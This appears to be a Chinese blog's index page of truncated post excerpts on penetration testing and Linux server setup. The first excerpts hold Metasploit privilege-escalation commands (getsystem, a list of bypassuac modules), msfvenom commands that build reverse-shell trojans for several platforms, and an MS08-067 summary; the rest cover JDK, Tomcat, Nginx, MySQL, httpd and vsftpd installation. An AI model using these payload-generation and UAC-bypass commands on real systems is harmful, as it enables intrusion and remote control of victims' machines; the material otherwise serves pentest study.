做 讓 人 远 远 聽 見 的 風

直接输入提升权限命令meterpreter>getsystem 使用MSF内置BYPASSUAC提权MSF内置有多个bypassuac模块，原理有所不同，使用方法类似，运行后返回一个新会话后再次执行getsystem获取系统权限。 msf6>search bypassuacexploit/windows/local/bypassuacexploit/windows/local/bypassuac_comhijackexploit/windows/local/bypassuac_eventvwr exploit/windows/local/bypassuac_fodhelperexploit/windows/local/bypassuac_injectionexploit/windows/local/bypassuac_injection_winsxsexploit/windows/local/bypassuac_sluihijackexploit/windows/local/bypassuac_vbs 使用MSF的enum_patches模块使用MSF的enum_patc ...

msf生成linux木马文件命令生成木马文件Windows：msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名Linux:msfvenom -p linux/x86(x64)/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名PHP:msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.phpASP:msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.aspJSP:msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jspWAR: ...

漏洞简介MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”，攻击者利用受害者主机默认开放的SMB服务端口445，发送特殊RPC（Remote Procedure Call，远程过程调用）请求，造成栈缓冲区内存错误，从而被利用实施远程代码执行。 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚至还包括 测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验 证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火 墙配置有助于保护网络资源免受从企业外部发起的攻击。 漏洞原理： MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCa ...

MSF简介Metasploit框架（Metasploit Framework, MSF）是一个开源工具，旨在方便渗透测试，它是由Ruby程序语言编写的模板化框架，具有很好的扩展性，便于渗透测试人员开发、使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口（如控制台、 Web 、 CLI ）。推荐使用控制台接口，通过控制台接口，你可以访问和使用所有Metasploit的插件，例如Payload、利用模块、 Post模块等。 Metasploit还有第三方程序的接口，例如Nmap、SQLMap 等，可以直接在控制台接口里使用，要访问该界面。 MSF五大模块类型Auxiliaries（辅助模块）该模块不会直接在测试者和目标主机之间建立访问，它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。Exploit（漏洞利用模块）漏洞利用是指由渗透测试者利用 一个系统、应用或者服务中的安全漏洞进行的攻击行为 。流行的渗透攻击技术包括缓冲区溢出、 Web应用程序攻击，以及利用配置错误等，其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序，用于破坏系统安全 ...

安装vim和net-toolsyum install vim -yyum install net-tools -y 安装JDK环境将预先下载好jdk解压，并更名为jdk，移动到/usr/local/目录下 tar -zxf jdk-8u161-linux-x64.tar.gzmv jdk1.8.0_161/ jdkmv jdk /usr/localvim /etc/profile 写入如下内容: JAVA_HOME=/usr/local/jdkPATH=$JAVA_HOME/bin:$PATHCLASSPATH=$JAVA_HOME/jre/lib/txt:$JAVA_HOME/lib/tools.jar export JAVA_HOME PATH CLASSPATH 使配置文件生效 source /etc/profile java -version #查看是否安装成功 安装Tomcat将预先下载好的tomcat包解压，并更名为tomcat，移动到/usr/local/目录下,并复制另外两个Tomcat出来 tar -zxf apache-tomcat-8.5.84. ...

安装Nginxyum install nginx -y 进入已配置好的网站根目录,创建两个测试文件夹文件夹中用于存放测试网站信息，即存放项目代码。 cd /usr/share/nginx/htmlmkdir Testpage-1mkdir Testpage-2 创建并编辑index.html文件index.html为将要显示的页面，同样可以把网站项目直接放在/usr/share/nginx/html/目录下，直接使用 cd /usr/share/nginx/html/Testpage-1/vim index.html按i进入编辑模式，输入以下测试内容。Test page 1:wq!保存 cd /usr/share/nginx/html/Testpage-2/vim index.html按i进入编辑模式，输入以下测试内容。Test page 2:wq!保存 配置Nginx运行以下命令查看nginx.conf配置文件。cat /etc/nginx/nginx.conf其中include /etc/nginx/conf.d/*.conf;表示Nginx将会从该路径下的所有.conf ...

yum安装nginxyum install nginx -y 查看nginx版本nginx -version 关闭防火墙systemctl stop firewalld 修改Nginx默认页面内容，浏览器访问ipvi /usr/share/nginx/html/index.html 可以添加修改Welcome to nginx!的内容，比如将Welcome to nginx!改为yjs213-22 也可以将index.html内容全部删除，直接添加自己想要的文字 也可以将网站源代码直接拉到/usr/share/nginx/html目录下，访问即可拥有做好的网站项目

检查是否已经安装Mysql，如未安装则执行下面命令为空。rpm -qa |grep -i mysql 如果不为空，则使用以下命令，进行删除安装过的包，删除相关服务，找出残余文件并删除。rpm -e 对应文件名chkconfig --list | grep -i mysqlchkconfig --del mysqlfind / -name mysqlrm -rf 对应文件路径 可能系统自带了Mariadb数据库，要先卸载。查询是否自带Mariadb数据库。 rpm -qa |grep Mariadb 有的话执行rpm -e --nodeps 对应软件包名字 我这里是rpm -e --nodeps mariadb-libs-5.5.56-2.el7.x86_64 下载Mysql源到服务器（一般可从这里开始，以上可忽略。）Mysql源地址：https://repo.mysql.com wget https://repo.mysql.com//mysql80-community-release-el7-3.noarch.rpm 此处地址是由https://repo.mysql.com 加上 ...

安装httpd服务yum -y install httpdsystemctl enable httpdvim /var/www/html/index.html 往index.html里面写内容 systemctl restart httpd 浏览器输入ip地址，即可显示自己制作的index.html页面。 将网站源码下载放到/var/www/html，即可显示制作好的网页内容。

安装vsftpdyum install -y vsftpdsystemctl enable vsftpd.servicesystemctl start vsftpd.servicenetstat -antup | grep ftp 添加FTP用户并修改密码[root@localhost ~]# adduser ftp22[root@localhost ~]# passwd ftp22 为FTP用户创建文件夹及文件[root@localhost ~]# mkdir /var/ftp/22[root@localhost ~]# touch /var/ftp/22/22.txt 将目录以及其子目录下的所有文件归属者改成需要设置给予权限的用户[root@localhost ~]# chown -R ftp22:ftp22 /var/ftp/22 关闭防火墙[root@localhost ~]# systemctl stop firewalld[root@localhost ~]# systemctl disabled firewalld 配置vsftpd.conf文件vsftpd.conf ...